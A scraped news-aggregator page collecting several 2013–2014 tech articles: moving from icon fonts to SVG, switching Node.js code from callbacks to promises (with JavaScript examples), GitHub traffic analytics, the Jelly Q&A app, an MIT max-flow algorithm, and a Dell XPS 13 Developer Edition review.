Quantcast
Channel: Hacker News 50
Viewing all 9433 articles
Browse latest View live

Ten reasons we switched from an icon font to SVG - Ian Feather

$
0
0

Comments:"Ten reasons we switched from an icon font to SVG - Ian Feather"

URL:http://ianfeather.co.uk/ten-reasons-we-switched-from-an-icon-font-to-svg/


We use a lot of icons on lonelyplanet.com and recently went through the task of transferring them from an icon font to SVG files. I wanted to share why we did this along with some of the current limitations to SVG and how we got around them.

1. Separation of concerns.

We use a custom font on lonelyplanet.com and we used to bundle the icons into the same file, storing the glyphs within the Private Unicode Area. This was great because it meant one less HTTP request to fetch the icons but we also felt that it limited our flexibility in how we prioritised resource loading.

We consider a small subset of our icons to be critical to the user's experience but we don’t think that way about our font or the other icons. We try to load non-critical assets after the page content and this was something we weren't able to do with the previous approach.

Breaking the critical icons out from the font and the rest of the icons allowed us to be more granular in how we delivered them to the user.

Counter argument

You don't have to bundle the font and the font icons together, you could serve two separate fonts. This is something we probably would have done had we stuck with the font-face solution.

2. Some devices don't honour the Private Unicode Area.

I'd heard rumours about devices overriding glyphs in the private unicode area and using them to serve emoji but I hadn't seen it happen until recently. Emoji was historically stored in the private unicode area, but at different ranges, so it would make sense that there could be conflicts.

I can't remember which device I was testing on but I saw one of our tick icons replaced with a multi-colour printer. The page looked amateurish and broken and certainly gave us impetus to make this transition.

3. Black squares and crosses on Opera Mini.

Font face support and detection is historically quite tricky to get right. I'm sure you've all seen this image of font awesome rendering on Opera Mini:

I won't go over the intricacies of this problem as Opera Mini support and many other platforms have been covered very well in this article by @kaelig.

I think what is really important though, beyond Opera Mini, is that this highlights a blind spot that we're not able to control. We physically aren't able to test on every device so it makes sense to favour techniques that are more likely to render consistently.

We don't get a huge amount of traffic from Opera Mini at the moment but we're a travel company serving people in all conditions on all bandwidths so we want to do better than that. With SVG and PNG we feel more confident that users won't get a broken and confusing page.

4. Chrome support for font-icons has been terrible recently.

Chrome Canary and Beta were hit with a fairly horrible font bug recently. If you haven't yet noticed the bug, fonts have been unloading and reverting to a system font after the page has experienced a period of inactivity.

When a font unloads and you're left with the text served as Georgia it can be a little annoying. The page is still very usable though. If the same font is responsible for serving the icons then suddenly the page is littered with black squares and looks broken.

This bug was introduced during our transition to SVG. It was a relief to cut over just as we were starting to get our first bug reports about it.

Counter argument

Those bugs haven't made it to a stable build of Chrome.

5. Crisper icons in Firefox.

We've found that our font renders at a slightly stronger weight in Firefox than in other browsers. This is OK for text (although not great) but for icons it can make the entire page look a bit unloved and clumsy. By using SVG we are able to normalise the look and feel of our icons cross browser.

6. You don't always have to use generated content.

If you want to use font-icons in css you need to declare them using the content property on generated content. Sometimes you might find yourself having to complicate your code to make this possible i.e. because you are already using the :before and :after pseudo elements or because the element doesn't support generated content.

In that case you could choose to render it inline but you then end up with html entities scattered through your markup which can easily be lost or forgotten within a large application.

This problem is removed with SVG as you are not limited to generated content and can render them as a background image on any element.

7. Less fiddly to position.

Admittedly this may be a result of how we created and managed our icon glyphs but we always found them awkward to position exactly how we wanted (and in a consistent fashion cross browser). We resorted to line height hacks and absolute/relative positioning to get them just right and it was difficult to come up with an abstraction that worked consistently.

With SVG we've found the placement much more willing. We use background-size: cover and simply resize the element to ensure consistency across browsers.

8. Multi-colour icons.

Font icons are well known to have a single colour limitation. SVGs, on the other hand, can support multiple colours as well as gradients and other graphical features.

We have always had to support multi-colour icons for our maps and had previously used an additional PNG sprite alongside our icon font. As a result of the move to SVG we were able to delete this sprite which meant one less request for the user and one asset fewer to maintain.

Counter argument

Multi-colour font icons can be accomplished using icon layering.

It is significantly more challenging to do so successfully though: if positioning one glyph correctly cross-browser is tricky, it doesn't get easier with two.

9. SVGs allow us to use animation within our icons.

We haven't yet utilised this feature but is likely something we will look into now that we have made the jump.

10. It's always felt like a hack.

Through a combination of all of the above, using font-face for icons has always felt like a hack. It is a brilliant hack, no doubt, but it's still a different asset type masquerading and being manipulated into something greater.

What about the benefits of font-face?

Serving icons through font-face does have some benefits over SVG and we had to consider these in depth before making the transition. The most pertinent benefits for font-face are browser support and colour flexibility.

It's fair to say that it would have been considerably harder to tackle these problems without the great work already done by the filamentgroup on Grunticon.

Colour variations

The huge benefit to using an icon font is its flexibility. You have no limitation to the amount of colour variations and can easily switch it depending on the current state (:hover, :focus, .is-active etc.). This is a rare luxury and very useful for quick development. It was also the reason we resisted making the leap to SVG for so long.

Our solution

There are a few solutions out there to provide this functionality although all of them have their own limitations (for now). We finally came up with a technique which we were pretty happy with and which toed the line between flexibility and resource size.

Grunticon is designed to declare each icon individually, thus avoiding having to use sprites. We followed suit with this approach but, although we had one css selector per icon, we served each icon in six different colours as shown here.

As we were just duplicating the same icon multiple times within the same file, it compressed down to the size of just one icon (plus around 50 bytes for gzip pointers). This meant that we could have n colour variations for each icon at almost no cost. Here's a jsFiddle showing how this technique works.

With this solution we had the flexibility back that we thought we would miss. By taking away total flexibility it also brought the added benefit of reinforcing colour palette consistency, something that had gradually been lost from our font icon implementation.

With this technique it is also easy to apply state-based changes to the icons by updating their background position.

It's worth mentioning that in the future we may be able to remove the sprite altogether and use SVG Fragment Identifiers to change the colour.

Browser support

Font icons work all the way back to IE8 whereas SVG does not. For our implementation we also required support for background-size although this is fairly comparable to SVG support.

Our solution

Grunticon handles legacy support right out of the box. It will create PNG versions of your SVG files and serve them to legacy browsers depending on whether or not they have support for SVG.

We decided to serve just a subset of the icons (the critical ones, like the logo) to legacy browsers due to a lack of support for background-size. We could have avoided the need for this css property by resizing all the original SVG files but, as many of the icons are used at multiple sizes, we preferred to serve just the critical icons and keep them consistent within the sprite.

We also tried using this background-size polyfill but quickly abandoned it. I would definitely recommend avoiding this if you have more than one or two images you need to resize. We found that more than two caused IE8 to crash consistently.

Was it worth it?

Both techniques are resolution independent, scalable and fairly lightweight so if you are using either it is good for the user. We felt that on balance SVGs gave us more confidence in how our application would appear to each user and that extra element of control was ultimately what it came down to.

SVGs have been live on Lonely Planet since November 2013 and development has been painless so far.


Why I am switching to promises

$
0
0

Comments:"Why I am switching to promises"

URL:http://spion.github.io/posts/why-i-am-switching-to-promises.html


I'm switching my node code from callbacks to promises. The reasons aren't merely aesthetical, they're rather practical:

Throw-catch vs throw-crash

We're all human. We make mistakes, and then JavaScript throws an error. How do callbacks punish that mistake? They crash your process!

But spion, why don't you use domains?

Yes, I could do that. I could crash my process gracefully instead of letting it just crash. But its still a crash no matter what lipstick you put on it. It still results with an inoperative worker. With thousands of requests, 0.5% hitting a throwing path means over 50 process shutdowns and most likely denial of service.

And guess what a user that hits an error does? Starts repeatedly refreshing the page, thats what. The horror!

Promises are throw-safe. If an error is thrown in one of the .then callbacks, only that single promise chain will die. I can also attach error or "finally" handlers to do any clean up if necessary - transparently! The process will happily continue to serve the rest of my users.

For more info see #5114 and #5149. To find out how promises can solve this, see bluebird #51

if (err) return callback(err)

That line is haunting me in my dreams now. What happened to the DRY principle?

I understand that its important to explicitly handle all errors. But I don't believe its important to explicitly bubble them up the callback chain. If I don't deal with the error here, thats because I can't deal with the error there - I simply don't have enough context.

But spion, why don't you wrap your calbacks?

I guess I could do that and lose the callback stack when generating a new Error(). Or since I'm already wrapping things, why not wrap the entire thing with promises, rely on longStackSupport, and handle errors at my discretion?

Also, what happened to the DRY principle?

Promises are now part of ES6

Yes, they will become a part of the language. New DOM APIs will be using them too. jQuery already switched to promise...ish things. Angular utilizes promises everywhere (even in the templates). Ember uses promises. The list goes on.

Browser libraries already switched. I'm switching too.

Containing Zalgo

Your promise library prevents you from releasing Zalgo. You can't release Zalgo with promises. Its impossible for a promise to result with the release of the Zalgo-beast. Promises are Zalgo-safe (see section 3.1).

Callbacks getting called multiple times

Promises solve that too. Once the operation is complete and the promise is resolved (either with a result or with an error), it cannot be resolved again.

Promises can do your laundry

Oops, unfortunately, promises wont do that. You still need to do it manually.

But you said promises are slow!

Yes, I know I wrote that. But I was wrong. A month after I wrote the giant comparison of async patterns, Petka Antonov wrote Bluebird. Its a wicked fast promise library, and here are the charts to prove it:

Time to complete (ms)

Parallel requests

Memory usage (MB)

Parallel requests

And now, a table containing many patterns, 10 000 parallel requests, 1 ms per I/O op. Measure ALL the things!

file time(ms) memory(MB) callbacks-original.js 316 34.97 callbacks-flattened.js 335 35.10 callbacks-catcher.js 355 30.20 promises-bluebird-generator.js 364 41.89 dst-streamline.js 441 46.91 callbacks-deferred-queue.js 455 38.10 callbacks-generator-suspend.js 466 45.20 promises-bluebird.js 512 57.45 thunks-generator-gens.js 517 40.29 thunks-generator-co.js 707 47.95 promises-compose-bluebird.js 710 73.11 callbacks-generator-genny.js 801 67.67 callbacks-async-waterfall.js 989 89.97 promises-bluebird-spawn.js 1227 66.98 promises-kew.js 1578 105.14 dst-stratifiedjs-compiled.js 2341 148.24 rx.js 2369 266.59 promises-when.js 7950 240.11 promises-q-generator.js 21828 702.93 promises-q.js 28262 712.93 promises-compose-q.js 59413 778.05

Promises are not slow. At least, not anymore. Infact, bluebird generators are almost as fast as regular callback code (they're also the fastest generators as of now). And bluebird promises are definitely at least two times faster than async.waterfall.

Considering that bluebird wraps the underlying callback-based libraries and makes your own callbacks exception-safe, this is really amazing. async.waterfall doesn't do this. exceptions still crash your process.

What about stack traces?

Bluebird has them behind a flag that slows it down about 5 times. They're even longer than Q's longStackSupport: bluebird can give you the entire event chain. Simply enable the flag in development mode, and you're suddenly in debugging nirvana. It may even be viable to turn them on in production!

This is a valid point. Mikeal said it: If you write a library based on promises, nobody is going to use it.

However, both bluebird and Q give you promise.nodeify. With it, you can write a library with a dual API that can both take callbacks and return promises:

module.exports = function fetch(itemId, callback) {
 return locate(itemId).then(function(location) {
 return getFrom(location, itemId);
 }).nodeify(callback);
}

And now my library is not imposing promises on you. Infact, my library is even friendlier to the community: if I make a dumb mistake that causes an exception to be thrown in the library, the exception will be passed as an error to your callback instead of crashing your process. Now I don't have to fear the wrath of angry library users expecting zero downtime on their production servers. Thats always a plus, right?

What about generators?

To use generators with callbacks you have two options

use a resumer style library like suspend or genny wrap callback-taking functions to become thunk returning functions.

Since #1 is proving to be unpopular, and #2 already involves wrapping, why not just s/thunk/promise/g in #2 and use generators with promises?

But promises are unnecessarily complicated!

Yes, the terminology used to explain promises can often be confusing. But promises themselves are pretty simple - they're basically like lightweight streams for single values.

Here is a straight-forward guide that uses known principles and analogies from node (remember, the focus is on simplicity, not correctness):

Edit (2014-01-07): I decided to re-do this tutorial into a series of short articles called promise nuggets. The content is CC0 so feel free to fork, modify, improve or send pull requests. The old tutorial will remain available within this article.

Promises are objects that have a then method. Unlike node functions, which take a single callback, the then method of a promise can take two callbacks: a success callback and an error callback. When one of these two callbacks returns a value or throws an exception, then must behave in a way that enables stream-like chaining and simplified error handling. Lets explain that behavior of then through examples:

Imagine that node's fs was wrapped to work in this manner. This is pretty easy to do - bluebird already lets you do something like that with promisify(). Then this code:

fs.readFile(file, function(err, res) {
 if (err) handleError();
 doStuffWith(res);
});

will look like this:

fs.readFile(file).then(function(res) {
 doStuffWith(res);
}, function(err) {
 handleError();
});

Whats going on here? fs.readFile(file) starts a file reading operation. That operation is not yet complete at the point when readFile returns. This means we can't return the file content. But we can still return something: we can return the reading operation itself. And that operation is represanted with a promise.

This is sort of like a single-value stream:

net.connect(port).on('data', function(res) { 
 doStuffWith(res); 
}).on('error', function(err) { 
 hadnleError(); 
});

So far, this doesn't look that different from regular node callbacks - except that you use a second callback for the error (which isn't necessarily better). So when does it get better?

Its better because you can attach the callback later if you want. Remember, fs.readFile(file)returns a promise now, so you can put that in a var, or return it from a function:

var filePromise = fs.readFile(file);
// do more stuff... even nest inside another promise, then
filePromise.then(function(res) { ... });

Yup, the second callback is optional. We're going to see why later.

Okay, that's still not much of an improvement. How about this then? You can attach more than one callback to a promise if you like:

filePromise.then(function(res) { uploadData(url, res); });
filePromise.then(function(res) { saveLocal(url, res); });

Hey, this is beginning to look more and more like streams - they too can be piped to multiple destinations. But unlike streams, you can attach more callbacks and get the value even after the file reading operation completes.

Still not good enough?

What if I told you... that if you return something from inside a .then() callback, then you'll get a promise for that thing on the outside?

Say you want to get a line from a file. Well, you can get a promise for that line instead:


var filePromise = fs.readFile(file)
var linePromise = filePromise.then(function(data) {
 return data.toString().split('\n')[line];
});
var beginsWithHelloPromise = linePromise.then(function(line) {
 return /^hello/.test(line);
});

Thats pretty cool, although not terribly useful - we could just put both sync operations in the first .then() callback and be done with it.

But guess what happens when you return a promise from within a .then callback. You get a promise for a promise outside of .then()? Nope, you just get the same promise!

function readProcessAndSave(inPath, outPath) {
 // read the file
 var filePromise = fs.readFile(inPath);
 // then send it to the transform service
 var transformedPromise = filePromise.then(function(content) { 
 return service.transform(content);
 });
 // then save the transformed content
 var writeFilePromise = transformedPromise.then(function(transformed) {
 return fs.writeFile(otherPath, transformed)
 });
 // return a promise that "succeeds" when the file is saved.
 return writeFilePromise;
}
readProcessAndSave(file, url, otherPath).then(function() {
 console.log("Success!");
}, function(err) {
 // This function will catch *ALL* errors from the above 
 // operations including any exceptions thrown inside .then 
 console.log("Oops, it failed.", err);
});

Now its easier to understand chaining: at the end of every function passed to a .then() call, simply return a promise.

Lets make our code even shorter:

function readProcessAndSave(file, url, otherPath) {
 return fs.readFile(file)
 .then(service.transform)
 .then(fs.writeFile.bind(fs, otherPath));
}

Mind = blown! Notice how I don't have to manually propagate errors. They will automatically get passed with the returned promise.

What if we want to read, process, then upload, then also save locally?

function readUploadAndSave(file, url, otherPath) {
 var content;
 // read the file and transform it
 return fs.readFile(file)
 .then(service.transform)
 .then(function(vContent)
 content = vContent;
 // then upload it
 return uploadData(url, content);
 }).then(function() { // after its uploaded
 // save it
 return fs.writeFile(otherPath, content);
 });
}

Or just nest it if you prefer the closure.

function readUploadAndSave(file, url, otherPath) {
 // read the file and transform it
 return fs.readFile(file)
 .then(service.transform)
 .then(function(content)
 return uploadData(url, content).then(function() {
 // after its uploaded, save it
 return fs.writeFile(otherPath, content);
 });
 });
}

But hey, you can also upload and save in parallel!

function readUploadAndSave(file, url, otherPath) {
 // read the file and transform it
 return fs.readFile(file)
 .then(service.transform)
 .then(function(content) {
 // create a promise that is done when both the upload
 // and file write are done:
 return Promise.join(
 uploadData(url, content),
 fs.writeFile(otherPath, content));
 });
}

No, these are not "conveniently chosen" functions. Promise code really is that short in practice!

Similarly to how in a stream.pipe chain the last stream is returned, in promise pipes the promise returned from the last .then callback is returned.

Thats all you need, really. The rest is just converting callback-taking functions to promise-returning functions and using the stuff above to do your control flow.

You can also return values in case of an error. So for example, to write areadFileOrDefault (which returns a default value if for example the file doesn't exist) you would simply return the default value from the error callback:

function readFileOrDefault(file, defaultContent) {
 return fs.readFile(file).then(function(fileContent) {
 return fileContent;
 }, function(err) {
 return defaultContent;
 });
}

You can also throw exceptions within both callbacks passed to .then. The user of the returned promise can catch those errors by adding the second .then handler

Now how about configFromFileOrDefault that reads and parses a JSON config file, falls back to a default config if the file doesn't exist, but reports JSON parsing errors? Here it is:

function configFromFileOrDefault(file, defaultConfig) {
 // if fs.readFile fails, a default config is returned.
 // if JSON.parse throws, this promise propagates that.
 return fs.readFile(file).then(JSON.parse, 
 function ifReadFails() { 
 return defaultConfig; 
 });
 // if we want to catch JSON.parse errors, we need to chain another
 // .then here - this one only captures errors from fs.readFile(file)
}

Finally, you can make sure your resources are released in all cases, even when an error or exception happens:

var result = doSomethingAsync();
return result.then(function(value) {
 // clean up first, then return the value.
 return cleanUp().then(function() { return value; }) 
}, function(err) {
 // clean up, then re-throw that error
 return cleanUp().then(function() { throw err; });
})

Or you can do the same using .finally (from both Bluebird and Q):

var result = doSomethingAsync();
return result.finally(cleanUp);

The same promise is still returned, but only after cleanUp completes.

But what about async?

Since promises are actual values, most of the tools in async.js become unnecessary and you can just use whatever you're using for regular values, like your regular array.map / array.reduce functions, or just plain for loops. That, and a couple of promise array tools like .all, .spread and .some

You already have async.waterfall and async.auto with .then and .spread chaining:

files.getLastTwoVersions(filename)
 .then(function(items) {
 // fetch versions in parallel
 var v1 = versions.get(items.last),
 v2 = versions.get(items.previous);
 return [v1, v2];
 })
 .spread(function(v1, v2) { 
 // both of these are now complete.
 return diffService.compare(v1.blob, v2.blob)
 })
 .then(function(diff) {
 // voila, diff is ready. Do something with it.
 });

async.parallel / async.map are straightforward:

// download all items, then get their names
var pNames = ids.map(function(id) { 
 return getItem(id).then(function(result) { 
 return result.name;
 });
});
// wait for things to complete:
Promise.all(pNames).then(function(names) {
 // we now have all the names.
});

What if you want to wait for the current item to download first (like async.mapSeries and async.series)? Thats also pretty straightforward: just wait for the current download to complete, then start the next download, then extract the item name, and thats exactly what you say in the code:

// start with current being an "empty" already-fulfilled promise
var current = Promise.fulfilled();
var namePromises = ids.map(function(id) { 
 // wait for the current download to complete, then get the next
 // item, then extract its name.
 current = current
 .then(function() { return getItem(id); })
 .then(function(item) { return item.name; });
 return current;
}); 
Promise.all(namePromises).then(function(names) {
 // use all names here.
});

The only thing that remains is mapLimit - which is a bit harder to write - but still not that hard:

var queued = [], parallel = 3;
var namePromises = ids.map(function(id) {
 // How many items must download before fetching the next?
 // The queued, minus those running in parallel, plus one of 
 // the parallel slots.
 var mustComplete = Math.max(0, queued.length - parallel + 1);
 // when enough items are complete, queue another request for an item 
 return Promise.some(queued, mustComplete)
 .then(function() {
 var download = getItem(id);
 queued.push(download);
 return download; 
 }).then(function(item) {
 // after that new download completes, get the item's name. 
 return item.name;
 });
 });
Promise.all(namePromises).then(function(names) {
 // use all names here.
});

That covers most of async.

What about early returns?

Early returns are a pattern used throughout both sync and async code. Take this hypothetical sync example:

function getItem(key) {
 var item;
 // early-return if the item is in the cache.
 if (item = cache.get(key)) return item;
 // continue to get the item from the database. cache.put returns the item.
 item = cache.put(database.get(key));
 return item;
}

If we attempt to write this using promises, at first it looks impossible:

function getItem(key) {
 return cache.get(key).then(function(item) {
 // early-return if the item is in the cache.
 if (item) return item;
 return database.get(item)
 }).then(function(putOrItem) {
 // what do we do here to avoid the unnecessary cache.put ?
 })
}

How can we solve this?

We solve it by remembering that the callback variant looks like this:

function getItem(key, callback) {
 cache.get(key, function(err, res) {
 // early-return if the item is in the cache.
 if (res) return callback(null, res);
 // continue to get the item from the database
 database.get(key, function(err, res) {
 if (err) return callback(err);
 // cache.put calls back with the item
 cache.put(key, res, callback); 
 })
 })
}

The promise version can do pretty much the same - just nest the rest of the chain inside the first callback.

function getItem(key) {
 return cache.get(key).then(function(res) {
 // early return if the item is in the cache
 if (res) return res;
 // continue the chain within the callback.
 return database.get(key)
 .then(cache.put); 
 });
}

Or alternatively, if a cache miss results with an error:

function getItem(key) {
 return cache.get(key).catch(function(err) {
 return database.get(key).then(cache.put); 
 });
}

That means that early returns are just as easy as with callbacks, and sometimes even easier (in case of errors)

What about streams?

Promises can work very well with streams. Imagine a limit stream that allows at most 3 promises resolving in parallel, backpressuring otherwise, processing items from leveldb:

originalSublevel.createReadStream().pipe(limit(3, function(data) {
 return convertor(data.value).then(function(converted) {
 return {key: data.key, value: converted};
 });
})).pipe(convertedSublevel.createWriteStream());

Or how about stream pipelines that are safe from errors without attaching error handlers to all of them?

pipeline(original, limiter, converted).then(function(done) {
}, function(streamError) {
})

Looks awesome. I definitely want to explore that.

The future?

In ES7, promises will become monadic (by getting flatMap and unit). Also, we're going to get generic syntax sugar for monads. Then, it trully wont matter what style you use - stream, promise or thunk - as long as it also implements the monad functions. That is, except for callback-passing style - it wont be able to join the party because it doesn't produce values.

I'm just kidding, of course. I don't know if thats going to happen. Either way, promises are useful and practical and will remain useful and practical in the future.

Get Facebook Wi-Fi for Your Business | Facebook

Introducing GitHub Traffic Analytics · GitHub

$
0
0

Comments:"Introducing GitHub Traffic Analytics · GitHub"

URL:https://github.com/blog/1672-introducing-github-traffic-analytics


The holidays are over and we're getting back into the shipping spirit at GitHub. We want to kick off 2014 with a bang, so today we're happy to launch Traffic analytics!

You can now see detailed analytics data for repositories that you're an owner of or that you can push to. Just load up the graphs page for your particular repository and you'll see a new link to the traffic page.

When you land on the traffic page you'll see a lot of useful information about your repositories including where people are coming from and what they're viewing.

Looking at these numbers for our own repositories has been fun, sometimes surprising, and always interesting. We hope you enjoy it as much as we have!

Need help or found a bug? Contact us.

Jelly – Introducing Jelly

$
0
0

Comments:"Jelly – Introducing Jelly"

URL:http://blog.jelly.co/post/72563498393/introducing-jelly


Humanity is connected like never before. In fact, recent white papers have concluded that the proverbial “six degrees of separation” is now down to four because of social networking and mobile phones. It’s not hard to imagine that the true promise of a connected society is people helping each other.

Let’s Help Each Other

Using Jelly is kinda like using a conventional search engine in that you ask it stuff and it returns answers. But, that’s where the similarities end. Albert Einstein famously said, “Information is not knowledge.” Knowledge is the practical application of information from real human experience.

Jelly changes how we find answers because it uses pictures and people in our social networks. It turns out that getting answers from people is very different from retrieving information with algorithms. Also, it has the added benefit of being fun. Here are the three key features of Jelly.

Friends follow friends.

Jelly works with your existing social networks.

Jelly is designed to search the group mind of your social networks—and what goes around, comes around. You may find yourself answering questions as well as asking. You can help friends, or friends-of-friends with their questions and grow your collection of thank you cards. It feels good to help.

Paying it “Forward”

There is strength in weak ties.

My mom used to say, “It’s not what you know, it’s who you know.” Any question on Jelly can be forwarded outside the app—to anyone in the world. Maybe your friend, or even your friend’s friend doesn’t have the answer. However, your friend’s friend’s friend just might. It’s a small world after all.

Point, shoot, ask!

Questions with images deepen their context.

In a world where 140 characters is considered a maximum length, a picture really is worth a thousand words. Images are in the foreground of the Jelly experience because they add depth and context to any question. You can crop, reframe, zoom, and draw on your images to get more specific.

How Does Jelly Work?

Say you’re walking along and you spot something unusual. You want to know what it is so you launch Jelly, take a picture, circle it with your finger, and type, “What’s this?” That query is submitted to some people in your network who also have Jelly. Jelly notifies you when you have answers. (See video.)

No matter how sophisticated our algorithms become, they are still no match for the experience, inventiveness, and creativity of the human mind. Jelly is a new way to search and something more–it makes helping other people easy and fun. We hope you find Jelly as useful and rewarding as we do.

New algorithm can dramatically streamline solutions to the ‘max flow’ problem - MIT News Office

$
0
0

Comments:"New algorithm can dramatically streamline solutions to the ‘max flow’ problem - MIT News Office"

URL:http://web.mit.edu/newsoffice/2013/new-algorithm-can-dramatically-streamline-solutions-to-the-max-flow-problem-0107.html


Finding the most efficient way to transport items across a network like the U.S. highway system or the Internet is a problem that has taxed mathematicians and computer scientists for decades.

To tackle the problem, researchers have traditionally used a maximum-flow algorithm, also known as “max flow,” in which a network is represented as a graph with a series of nodes, known as vertices, and connecting lines between them, called edges.

Given that each edge has a maximum capacity — just like the roads or the fiber-optic cables used to transmit information around the Internet — such algorithms attempt to find the most efficient way to send goods from one node in the graph to another, without exceeding these constraints.

But as the size of networks like the Internet has grown exponentially, it is often prohibitively time-consuming to solve these problems using traditional computing techniques, according to Jonathan Kelner, an associate professor of applied mathematics at MIT and a member of MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL).

So in a paper to be presented at the ACM-SIAM Symposium on Discrete Algorithms in Portland, Ore., this week, Kelner and his colleague Lorenzo Orecchia, an applied mathematics instructor, alongside graduate students Yin Tat Lee and Aaron Sidford, will describe a new theoretical algorithm that can dramatically reduce the number of operations needed to solve the max-flow problem, making it possible to tackle even huge networks like the Internet or the human genome.

“There has recently been an explosion in the sizes of graphs being studied,” Kelner says. “For example, if you wanted to route traffic on the Internet, study all the connections on Facebook, or analyze genomic data, you could easily end up with graphs with millions, billions or even trillions of edges.”

Previous max-flow algorithms have come at the problem one edge, or path, at a time, Kelner says. So for example, when sending items from node A to node B, the algorithms would transmit some of the goods down one path, until they reached its maximum capacity, and then begin sending some down the next path.

“Many previous algorithms,” Kelner says, “would find a path from point A to point B, send some flow along it, and then say, ‘Given what I’ve already done, can I find another path along which I can send more?’ When one needs to send flow simultaneously along many different paths, this leads to an intrinsic limitation on the speed of the algorithm.”

But in 2011 Kelner, CSAIL graduate student Aleksander Madry, mathematics undergraduate Paul Christiano, and colleagues at Yale University and the University of Southern California developed a technique to analyze all of the paths simultaneously.

The researchers viewed the graph as a collection of electrical resistors, and then imagined connecting a battery to node A and a ground to node B, and allowing the current to flow through the network. “Electrical current doesn’t pick just one path, it will send a little bit of current over every resistor on the network,” Kelner says. “So it probes the whole graph globally, studying many paths at the same time.”

This allowed the new algorithm to solve the max-flow problem substantially faster than previous attempts.

Now the MIT team has developed a technique to reduce the running time even further, making it possible to analyze even gigantic networks, Kelner says.

Unlike previous algorithms, which have viewed all the paths within a graph as equals, the new technique identifies those routes that create a bottleneck within the network. The team’s algorithm divides each graph into clusters of well-connected nodes, and the paths between them that create bottlenecks, Kelner says.

“Our algorithm figures out which parts of the graph can easily route what they need to, and which parts are the bottlenecks. This allows you to focus on the problem areas and the high-level structure, instead of spending a lot of time making unimportant decisions, which means you can use your time a lot more efficiently,” he says.

The result is an almost linear algorithm, Kelner says, meaning the amount of time it takes to solve a problem is very close to being directly proportional to the number of nodes on the network. So if the number of nodes on the graph is multiplied by 10, the amount of time would be multiplied by something very close to 10, as opposed to being multiplied by 100 or 1,000, he says. “This means that it scales essentially as well as you could hope for with the size of the input,” he says.

Shanghua Teng, a professor of computer science at the University of Southern California who was not involved in the latest paper, says it represents a major breakthrough in graph algorithms and optimization software.

“This paper, which is the winner of the best paper award at the [ACM-SIAM] conference, is a result of sustained efforts by Kelner and his colleagues in applying electrical flows to design efficient graph algorithms,” Teng says. “The paper contains an amazing array of technical contributions.”


sneakers.io

Jx0.org: Dell XPS 13 Developer Edition review (Haswell, late 2013 model)

$
0
0

Comments:"Jx0.org: Dell XPS 13 Developer Edition review (Haswell, late 2013 model)"

URL:http://www.jx0.org/2013/12/dell-xps-13-developer-edition-review.html


The XPS 13 Developer Edition, aka "Project Sputnik", is a laptop with a FullHD 13-inch screen, backlit keyboard, SSD, 4th gen intel CPU and comes pre-installed with Ubuntu 12.04 LTS. What makes this machine so interesting is not so much that Ubuntu comes pre-installed on it (it would be easy for anybody to install it him/herself, after all), but rather that Dell put some extra-work in making sure everything works right out of the box and supports running Ubuntu on it. WiFi, keyboard backlight, screen brightness control, sleepmode, etc. are guaranteed to work. Additionally, you save a few bucks on the Windows license.
I had been interested in this machine before and since it was updated with the new Intel Haswell processors in November (official announcement by the project lead), I jumped on it (The alternative I thought about was the System76 Galago Ultrapro).

I placed my order on December 6th. Dell had a special promotion that day (and maybe also a pricing error? Not sure). The laptop was $ 1469 (instead of the usual $ 1549) and there was a $ 50 coupon on their website, bringing the whole thing down to $ 1419 before tax, including 3-day shipping. The estimated delivery date was January 16th at the time I placed my order (It seems they were having some supply issues).
However, on December 19th, I received a shipping notification and I had the package in my hands 2 days later.

The hardware specs:

CPU: Intel i7-4500U (dual core, 1.8 GHz, up to 3 GHz with TurboBoost, 4 MB cache)
Screen: 13.3 inch, 1920x1080
RAM: 8GB Dual Channel DDR3 SDRAM at 1600MHz
SSD: 256 GB mSATA
GFX: Intel HD 4400

It has two USB 3.0 ports (one on each side), a headphone/headset port and a mini Displayport. That's it (other than the power-port, of course). The lack of an SD card reader is a bit disappointing, but something I can live with.

One thing worth mentioning:
There is a different version of this laptop which comes with an i7-4650U CPU and HD 5000 graphics. Unfortunately, Dell USA only offers this version to corporate customers (through corporate channels). In other countries (like in the UK and France, for instance), you can see this higher-end version on Dell's website and you can order it from there. It's a pity that Dell keeps this version from consumers in the US. I don't understand why they're doing that, but it is what it is.

The laptop comes in a sleek black box, very stylish. The contents are as minimalistic as the box: Laptop, power supply and quick-start manual (for the Windows-version of the machine). The power-supply was a positive surprise: it's very small. Here it is next to the power-supply from a 13inch MacBook Pro:

In the picture above, you can see that the top-portion of the black powersupply can be taken off and replaced with cable (which is included in the box) in case you're further away from the wall-plug.

The plug which connects to the laptop has white LEDs on it. They light up when the power supply is plugged in to an outlet (regardless of whether or it's plugged in to the laptop). If the laptop is turned off (or sleeping) and the battery is charging, there's no way for you to tell whether the batter is full or not based on the color of the LED. It stays white. But on the right side of the laptop there is a little button which activates some battery-level-indicator LEDs on the laptop. That will show you the charge-level (see below).

First boot: Ubuntu animation, Dell User Agreement, then the standard Ubuntu installer. The WiFi connection worked right away without issues (I'm mentioning this because the WiFi connectivity of the Ivy Bridge XPS 13 DE had some significant issues with WiFi). I've had no lag, no disconnects, no hiccups so far (if this changes, I'll update this post). The only thing I noticed is that the WiFi-signal indicator at the top right of the screen shows 3 out of 4 bars. The router is only 3 or 4 meters away from the laptop, so this is weird. All other devices in my household show full bars when they're in the same room as the router. My experience has been fine, though. A speedtest showed normal results, I ran some FTP-transfers, downloads, SSH connections, all worked just fine.

The keyboard's backlight is on by default and can be switched on and off via Fn + F6. There doesn't seem to be a regulator for the brightness of the backlight, but that's not a problem for me. The keyboard itself is very nice to type on. Compared to a 13inch MacBook Pro, which I have here next to me, I'd say the keys of the XPS 13 feel a bit "stiffer", meaning it requires a little more force to push a key down than on the MBP. It is by no means hard to press a key, though, don't get me wrong. I like this "stiffness" and it makes for a comfortable typing-experience. For those familiar with the different Cherry MX-switches in mechanical keyboards, I'd say that the MBP keyboard compares to a MX-red and the XPS 13 keyboard compares to a MX-black (when I say "compares", I mean "veeeery loosely compares". It's just the best description I could come up with to give you an idea). After having used the XPS 13 for a few days and then going back to the MBP, I like the XPS's keyboard better.

Screen brightness control: Worked right away witout a hitch (via Fn + F4 / F5). I'm fine with one of the lower screen brightness levels most of the time. The lowest brightness setting on the MacBook Pro (which is too dark for me to use) is definitely darker than on the XPS 13. The lowest setting on the Dell works just fine for me and it will probably save me some battery as well. One thing I noticed was that the screen brightness sometimes resets itself to the default brightness after rebooting or waking up from suspend. (In that case, I simply have to set it back down. No biggie, but I wanted to mention it.)

